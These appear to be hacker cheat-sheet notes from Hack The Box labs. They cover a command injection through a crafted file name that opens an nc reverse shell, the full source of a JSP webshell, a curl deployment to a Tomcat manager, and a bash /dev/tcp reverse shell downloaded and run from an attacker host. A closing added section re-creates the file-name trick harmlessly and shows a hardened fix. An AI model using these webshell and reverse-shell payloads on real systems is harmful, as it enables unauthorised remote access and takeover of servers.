Odd Shells

Shell by file name
// Use when a file name is seen being interpolated into a command inside a script (networked on HTB: a cron script built a shell command out of the names of uploaded files).

#touch ';nc -c bash 10.10.14.23 2222;.php'

// The semicolons terminate the script's own command and start ours. nc had to be used here because '/' cannot appear in a file name, so the usual bash -i >& /dev/tcp/... or /bin/bash style reverse shells cannot be embedded this way.
// The .php suffix was only added so the script would pick the file up (it only processed files matching that pattern).

WAR file webshell
// Can get stuck when upgrading the RCE to a proper shell; the msfvenom war shell is the alternative.
// cmdjsp.jsp comes from the tennc webshell collection on GitHub.

#cp /opt/webshell/jsp/cmdjsp.jsp ~/htb/tabby/shell/cmdjsp.jsp
// Keep the file name "cmdjsp.jsp": the form posts back to that name, so the shell stops working if it is renamed.
// The stock copy targets Windows (cmd.exe); edit it for Linux. POST is used rather than GET because it is less restricted in what it can carry.
#cd ~/htb/tabby/shell
#nano cmdjsp.jsp

<FORM METHOD=POST ACTION='cmdjsp.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>

<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
    String s = null;
    try {
        // Runtime.exec() runs the command directly (no shell)
        Process p = Runtime.getRuntime().exec(cmd);
        BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
        while((s = sI.readLine()) != null) {
            output += s + "\n";   // keep line breaks, otherwise all output runs together on one line
        }
    } catch(IOException e) {
        e.printStackTrace();
    }
}
%>
<pre>
<%=output %>
</pre>

#jar -cvf cmdjsp.war *
// packs every file in the current directory into the WAR
#curl -T cmdjsp.war -u 'tomcat:s3cret' http://10.10.10.194:8080/manager/text/deploy?path=/squanch
// the /manager/text interface takes the WAR as a PUT body and needs an account with the manager-script role
// then browse to http://10.10.10.194:8080/squanch/cmdjsp.jsp (the context path must match the path= value used on deploy; note the .jsp extension is used again)

// Getting a reverse shell out of the RCE: Runtime.exec() does not go through a shell, it splits the string on whitespace and runs it directly, so redirections, pipes, & and /dev/tcp mean nothing to it. Stage the shell in a file instead.
write shell.sh:
bash -i >& /dev/tcp/10.10.14.23/3333 0>&1

host it on port 80, then in the webshell's command field pull it to disk and run it (two separate commands):
curl 10.10.14.23:80/shell.sh -o /tmp/shell.sh
bash /tmp/shell.sh
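The file-name trick above, re-created harmlessly as an added example (this is not from the original notes or from the HTB box). The "scanner" functions, the marker file and the temp directory are assumptions standing in for the real cron script; the vulnerable one interpolates each file name into a string handed to sh -c, the hardened one passes the name as an argument vector entry, and injection_fires reports whether the command embedded in the file name actually ran.

```shell
#!/bin/sh
# Added example, not from the original notes: a harmless re-creation of the
# "shell by file name" trick. A simulated script interpolates each file name
# into a shell command line (the bug), the fixed version passes the name as
# an argument instead, and injection_fires reports whether the payload ran.

# Vulnerable: the file name lands unquoted inside a string handed to sh -c,
# so a name like ';touch marker;.php' becomes three commands.
vulnerable_scan() {
    dir="$1"
    for f in "$dir"/*; do
        name=$(basename "$f")
        ( cd "$dir" && sh -c "echo scanning $name" ) >/dev/null 2>&1 || true
    done
}

# Hardened: the name is a single argv entry and is never re-parsed by a shell.
hardened_scan() {
    dir="$1"
    for f in "$dir"/*; do
        name=$(basename "$f")
        ( cd "$dir" && echo scanning "$name" ) >/dev/null 2>&1 || true
    done
}

# Drops a file named like the note's payload (a marker file stands in for the
# reverse shell; '/' cannot appear in a file name, so the marker path is
# relative and the scanner cd's into the directory first), runs the given
# scanner and prints yes if the embedded command executed, no otherwise.
injection_fires() {
    scanner="$1"
    work=$(mktemp -d)
    touch "$work/;touch marker;.php"   # constructed payload, same shape as ';nc -c bash ...;.php'
    "$scanner" "$work"
    if [ -e "$work/marker" ]; then echo yes; else echo no; fi
    rm -rf "$work"
}

injection_fires vulnerable_scan   # yes
injection_fires hardened_scan     # no
```

Run it as-is to see the two results; the only difference between the two scanners is whether the file name goes through a second shell parse, which is exactly what the `;` in the crafted name exploits.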
